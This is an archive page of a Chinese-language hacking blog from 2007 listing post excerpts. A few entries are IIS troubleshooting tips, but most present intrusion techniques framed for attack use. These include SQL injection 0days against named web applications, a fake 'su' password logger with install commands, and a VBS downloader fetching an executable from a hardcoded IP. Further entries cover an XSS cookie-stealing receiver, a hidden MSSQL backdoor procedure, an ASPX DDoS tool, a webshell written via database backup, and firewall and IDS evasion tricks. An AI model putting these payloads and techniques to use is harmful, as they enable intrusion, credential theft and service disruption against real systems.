08 2007 档案
浪人下载和浪人文章的漏洞利用
摘要:先随便点一个软件下载 官方都更新到2.4了,但是还是官方自己再用,不过也有漏洞哦 把下载地址复制到明小子里面,把I改成%69 看到了吗,没有改之前是不能注入额 恭喜,该URL可以注入! 数据库类型:Access数据库
阅读全文
MS07-046
摘要:/* * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code * by Hong Gil-Dong & Chun Woo-Chi * Yang yeon(?~1542), Korea * "I shall keep clenching my left fist unitl i see the real tao". * ...
阅读全文
windows2003限制500K解决方法
摘要:在服务器上进行如下操作: 先在服务里关闭 iis admin service 服务. 找到 windows\system32\inetsrv\ 下的 metabase.xml 文件. 打开, 找到 ASPMaxRequestEntityAllowed 修改为需要的值(可修改为2M即: 2048000), 默认为: 204800, 即: 200K. 然后重启 iis...
阅读全文
IIS 请求的资源在使用中 错误解决方法
摘要:运行regsvr32 jscript.dll和 regsvr32 vbscript.dll 重新注册JAVA脚本和VB脚本的动态链接库后一切正常
阅读全文
针对$_SERVER[’PHP_SELF’]的跨站脚本攻击
摘要:现在的web服务器和开发工具虽然不会再出现像asp的%81那样明显的漏洞了,但是由于开发人员的疏忽和各种语言特性组合造成的一些奇异的漏洞仍然会存在。今天偶然读到的XSS Woes,就详细讲述了和$_SERVER[’PHP_SELF’]相关的一个危险漏洞。 $_SERVER[’PHP_SELF’]在开发的时候常会用到,一般用来引用当前网页地址,并且它是系统自动生成的全局变量,也会有什么问题么?让我...
阅读全文
Apache全版本存在漏洞!
摘要:国外抄来的,这个漏洞可以停止所有的Apache服务器,不知道有人发过没。也没有经过测试,有兴趣的朋友可以测试一下!E文不懂不要紧,你不知道,google知道! ------------------------------------- 下面是原文: Hi This Exploit can Stop all apache in server then you can connect by netca...
阅读全文
linux下记录su密码
摘要:/* * kpr-fakesu.c V0.9beta167 ;P * by koper * * Setting up: * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c * admin@host:~$ mv .su /var/tmp/.su * admin@host:~$ cp .bash_profile .wgetrc * admin...
阅读全文
远古VOD存在严重注入漏洞!!
摘要:webmedia/common/function/xtree.asp id未过滤!
阅读全文
IIS常见问题一位高手整理的IIS
摘要:1.如何让asp脚本以system权限运行? 修改你asp脚本所对应的虚拟目录,把"应用程序保护"修改为"低".... 2.如何防止asp木马? 基于FileSystemObject组件的asp木马 cacls %systemroot%\system32\scrrun.dll /e /d guests //禁止guests使用 regsvr32 scrrun.dll /u /s //删除...
阅读全文
真正的IIS永远的后门解密
摘要:IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(...
阅读全文
Ettercap-交换环境下的嗅探器使用方法
摘要:一:安装 你可以在网上很多地方下载到它的最新版本,比如http://ettercap.sourceforge.net 下载完后,先解压缩: [root@CIEL root]#tar zxpvf ettercap-0.6.tar.gz [root@CIEL root]#cd ettercap-0.6 [root@CIEL ettercap-0.6]#./configure&&make&&make ...
阅读全文
入侵oracle数据库的一些心得
摘要:件作者:pt007[at]vip.sina.com版权所有,转载请注明版权 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 一、先看下面的一个贴子: Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点: 1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到几百千兆,可充...
阅读全文
风迅注入0day
摘要:user/buybag.asp 40行开始 if request.Form("action")="makeorder" then Dim productIDS,OrderRs,BagRs,OrderDetail,OrderNumber,ExpressCompany productIDS=DelHeadAndEndDot(request.Form("productIDS"))//这个函数...
阅读全文
VBS下载者和免杀
摘要:Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://202.75.208.29/calc.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 ...
阅读全文
php代码不开源下的一种漏洞检测思路
摘要:现在很多的php软件厂商为了一些目的都开始将自己的产品用Zend加密起来,当客户使用的时候根本不知道程序里面的细节,的确给那些搞安全的人很大的难度,所以一些厂商就开始认为只要是Zend过的产品都是安全的。但是其实不然,即使在不知道原代码并且不考虑Zend破解的情况下,我们一样可以利用 Php本身的一些特性来到达获取程序的一些商业逻辑以及信息以到达探测程序的漏洞等等。 测试程序的安全性方法一般有三种...
阅读全文
解析arp病毒背后利用的Javascript技术
摘要:请大家转载的时候注明引用出处(http://blog.csdn.net/michael_veking)以及作者信息(veking),谢谢! 本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁! 最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都无法上网,给工作带来了很大的不方便,在这里写下杀毒的过程...
阅读全文
动易2006_SP6跨站
摘要:鬼仔注:从7j那里看到的,并且有7j写的接收页面。7j:没有找到他说的接收页面,只有自已用PHP写个了 ""){ $tmp = fopen($filename,"a+"); fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n"); f...
阅读全文
.net下封装起来的conn逆向工程
摘要:---------------->Inherits="Lab_3rd.NewsView"程序是封装在dll文件里了,找到bin目录,可以看到Lab_3rd.dll然后对其进行反编译(Reflector是一个.net反编译工具),数据库连接特征字符一般是Conn然后去下载一个“code search”插件。搜索conn。就能发现封装在Dll文件里的数据库连接字符串!
阅读全文
超级隐藏的MSSQL扩展后门
摘要:鉴于现在管理员非常厉害,还会查隐藏帐户、还会查3389登陆日志、还会查Rootkit、还会查SQL LOG。真TMD BT。新发现一个后门非常隐藏---------------简单三步:1、将xplake2.dll复制到 Microsoft SQL server\mssql\binn目录2、运行如下命令: USE master EXEC sp_addextendedp...
阅读全文
session注入
摘要:codz: 使用:进行注入。。。。。这种方法的注入虽然比较麻烦,也有一定的局限性(必须拿下一个PZ站),但是他胜在是永远是一个变量,只是临时存在于服务器,IDS什么的都不能检测,倒,IIS也更不会有什么记录。我测试的是access数据库的,MSSQL的那就请大家自行测试了。还要说一下,PHP中貌似还有一个函数能构造注入,虽然很少能进库,但是也是一种新的攻击方法,因为我的mysql5....
阅读全文
QQ 0DAY?
摘要:鬼仔:我这里测试有的成功,有的不成功,原因不明。同样的版本的情况下,有的成功,有的失败。比如同样的beta1,有的失败,有的成功,beta4也有的失败,有的成功。当然,VBScript.qqs中的脚本可以自己修改,达到别的目的。利用场景。懒得贴图了,自己测试吧。 来源:Crab's Blog 把那3个文件解到\Tencent\QQ\IMScene\Scene\ 用记事本打开VBScript....
阅读全文
ASPX傀儡木乃伊(ASPX SYN DDOS)
摘要:JOBTHREADSTATEHOSTPORTERR MSGACTION"); int count = jobScheduler.Count; for (int i = 0; i "; break; case 1: dstate = "pause"; operate = ""; break; ...
阅读全文
IIS下另外一个危险的ISAPI扩展
摘要:我们先来看一份关于SSI的介绍:SSI有什么用? 之所以要扯到ssi,是因为shtml--server-parsed HTML 的首字母缩略词。包含有嵌入式服务器方包含命令的 HTML 文本。在被传送给浏览器之前,服务器会对 SHTML 文档进行完全地读取、分析以及修改。 shtml和asp 有一些相似,以shtml命名的文件里,使用了ssi的一些指令,就像asp中的指令,你可以在SHTML文件中...
阅读全文
Autorun.inf的新写法与应用以及防御
摘要:首先是autorun.inf一般的病毒的Autorun.inf文件内容为[autorun]open=.\RECYCLER\RECYCLER\autorun.exe shell\1=Openshell\1\Command=.\RECYCLER\RECYCLER\autorun.exeshell\2\=Browsershell\2\Command=.\RECYCLER\RECYCLER\autorun...
阅读全文
lsass进程即可解密系统管理员密码(XP成功测试)
摘要:Lsass.exe是Windows系统中必不可少的一个进程,属于微软Windows系统中安全机制相关进程。lsass.exe进程主要用于本地安全和登陆策略,同时也管理IP相关安全信息。对lsass.exe进程进行攻击,造成相应的缓冲区溢出,从而解密Windows系统中相关密码的方法一直是黑客们常用的一种手段。但是,由于lsass.exe进程属于Windows系统核心进程,所以对lsass.exe进...
阅读全文
ASPX差异备份
摘要:alter database Northwind set RECOVERY FULL--create table cmd (a image)--backup log Northwind to disk = 'c:\cmd1' with init--insert into cmd (a) values (0x323C25402050616765204C616E67756167653D224A73...
阅读全文
包子QQ自动攻击器?
摘要:dim a,b,ctrctr=0a=inputbox("请输入你要攻击的语言,目前只支持英文","包子QQ自动攻击器")b=inputbox("请输入你要攻击的次数","包子QQ自动攻击器")b=b+0do while ctr<bset wshshell=CreateObject("wscript.shell")wscript.sleep 500wshshell.sendkeys "CoDz By...
阅读全文
Discuz6.0 injection 0day
摘要:// 允许程序在 register_globals = off 的环境下工作$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');if ($onoff != 1) { @extract($_POST, EXTR_SKIP); @extract($_G...
阅读全文
Public权限下的列目录
摘要:提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧--建立一个临...
阅读全文
一段小批处理
摘要:@echo offclsrem code by ALLyeSNO:echo 给你讲个笑话:echo.set str=...................作业做了很久,顺手打开收音机,一个温柔的声音传出:“…如果肤色分红,脸上的绒毛细嫩柔软,那么说明很健康…” 听到这里,包子忍不住摸了自己的脸,对镜顾盼,再笑一笑,样子健康可爱。 这时,又听播音员说道:“好,听众朋友,这次我们的《养猪知识讲座》就到...
阅读全文
AntiARP防火墙卸载干净的方法
摘要:今天装了个AntiARP防火墙,用完卸载后发现,每次开机时都会提示,发现什么新硬件要驱动,真的很烦,搞来搞去才发现是AntiARP没卸载干净,刚到网上找了个方法,拿来和大家分享!1. 进入控制面版,卸载当前已经安装的ARP防火墙。(如果没有就跳过)2. 进入 网上邻居属性页 > 选择网卡属性 > 定位到 "AntiARP Firewall Driver" > 卸载 (如果没有就跳过)3. 进...
阅读全文
深入黑客内心世界 像黑客一样思考问题
摘要:Jeremy Poteet正在观看着他做安全工作的候选人网站上线。就在16分钟后,该网站遭到攻击。但是这个高度受关注的网站巧妙地规避了这些攻击,以及随之而来的其他攻击,因为Proteet已经预见到会发生此类攻击,并已经做出了对策。他是怎么知道的呢?很简单,他是一个黑客,像黑客一样思考问题,并且知道黑客使用的工具——这是保护公司不被攻击的最有效方法。作为App防御的首席安全官,Poteet这一类黑客...
阅读全文
一行让IE6崩溃的代码
摘要:一个日本博客发现只需一行代码就能让IE6崩溃,代码如下:这行代码在Firefox,Safari和Opera都能正确解析,但是在IE 6下却会引起mshtml.dll致命错误
阅读全文
熊猫卫士2008本地提权漏洞
摘要:===========================CODZ START===========================/*_________________________________________Security Advisory____________________________________________________________________________...
阅读全文
MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit
摘要:This a Poc Html code,Just copy it to the browser and execute it:
阅读全文
Dvbbs8严重漏洞
摘要:===========================================================================华夏原创动画 DVBBS8的漏洞 BY Allyesno[AT]77...
阅读全文
MSSQL2005注入攻击(测试兰州电信)
摘要:电信级的系统估计都是采用比较大型的数据库了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!兰州电信 号码百事通的网站 居然是用IIS+ASP!呵呵!ASP估计脚本小子都玩得很熟悉了!-_- 而且ASP不采用FSO生成静态页面技术!呵呵~其实注入点并不是那么好找的!毕竟是电信的大网站!测试了好多个点都失败,我个人比较喜欢找那些片偏僻的url连接!那些80%的程序员都会疏忽~! OK 来个经典 a...
阅读全文
ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX-
摘要:首先回顾一下以前ASP一句话的经典木马吧!"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然后解析语言终究发展成为中间代码例如java .net 动态执行也就不存在了!之前AS...
阅读全文
oblog商业版本4.6注射漏洞,直接拿管理员
摘要:漏洞描述:通过构造特定的语句,可以更改任何用户的密码,包括管理员,严重级漏洞。漏洞文件:AjaxServer.asp变量:log_files语句:log_files=Replace(log_files," ","")If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)rs("logpics") = log...
阅读全文
突破一流信息监控系统等IIS防火墙实现注入
摘要:先来说URL编码,%加两位的16进制表示一个字符,比如’经过编码之后就是%27,这是人人都知道的URL编码规则,UrlUnescapeInPlace之类的API函数甚至于程序员自己写的URL译码函数都是基于这一思想。 然而,我们何必如此听话,试想一下要是%后跟的不是16进制数字而是像abc%hh会发生什么事呢。先看UrlUnescapeInPlace,写个小程序试一下,abc%hh经过译码还是a...
阅读全文
安装SQL Server:以前的某个程序安装已在安装计算机上创建挂起的文件操作
摘要:安装SQL Server错误提示:以前的某个程序安装已在安装计算机上创建挂起的文件操作。运行安装程序之前必须重新启动计算机。打开注册表编辑器,在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager中找到PendingFileRenameOperations项目,并删除它。这样就可以清除安装暂挂项目。
阅读全文
ymcms SQL注入漏洞
摘要:影响版本:ymcms3.1.0 详细说明:forum_zoom.php31~48行if ($forumid != ""){$isforum = " && forumid IN (".$forumid.") ";}else{$isforum = "";}//forumid明显没有过滤……...
阅读全文
SUS迷你ftp后门
摘要:这个后门的思路绝对新颖,将后门融入小巧的ftp服务器中.既能进行快速大量可靠的ftp传文件,又不失后门强大的控制功能.既保持苗条的身材,又具备良好的隐身术和超强的稳定性.本后门完全无需使用特定的客户端程序,任何时间,任何地点,想怎么控制,就怎么玩。再加上它原创免杀的特性.怎么样,跃跃欲试了吧?这次发布的是测试版,压缩包内共一个文件wmiapsrv.exe。测试方法:将其解压到一个不含空格的目录里,...
阅读全文
命令行破解"组策略ip筛选"和"tcp/ip筛选"
摘要:"组策略ip筛选"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\windows\IPSec\Policy\Local\ipsecPolicy{字符}在里面找到相干的,删"tcp/ip筛选"停用服务IPSEC Policy Agent或者:regedit -e...
阅读全文
网页木马US-ASCII码,unicode码的加密解密
摘要:US-ASCII加密,就是把7bit转换为8bit原始的代码程序代码:程序代码sprite's Bloghttp://www.spr1t3.com加密后的代码程序代码:程序代码IE艰繇炀娂糸綮寰箴蜷翦�犅祜缂轸戾緤俭泸轲艟犰弪舁�屐...
阅读全文
ASP木马Webshell的安全防范解决办法
摘要:注意:本文所讲述之设置方法与环境:适用于Microsoft Windows 2000 Server/Win2003 SERVER IIS5.0/IIS6.01、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些?我们以海洋木马为列:〈object runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A...
阅读全文
黑客反跟踪
摘要:据我所知,很多人学习黑客技术都是从如何进入他人系统开始的,到处收集各种exploits、后门、木马等。但是,我最早学习的却不是这些, 而是这次我要讲的:黑客自我保护技术。因为,当时(现在我仍然这样认为)我觉得就算你的黑客技术再厉害,能攻入这样那样的系统,但当警察给你带上手铐的时候,这一切恐怕一点意义都没有了吧!所以,我认为一个没有绝对自保能力的黑客,根本不能算是黑客。不要用什么我不去非法入侵他人系...
阅读全文
浙公网安备 33010602011771号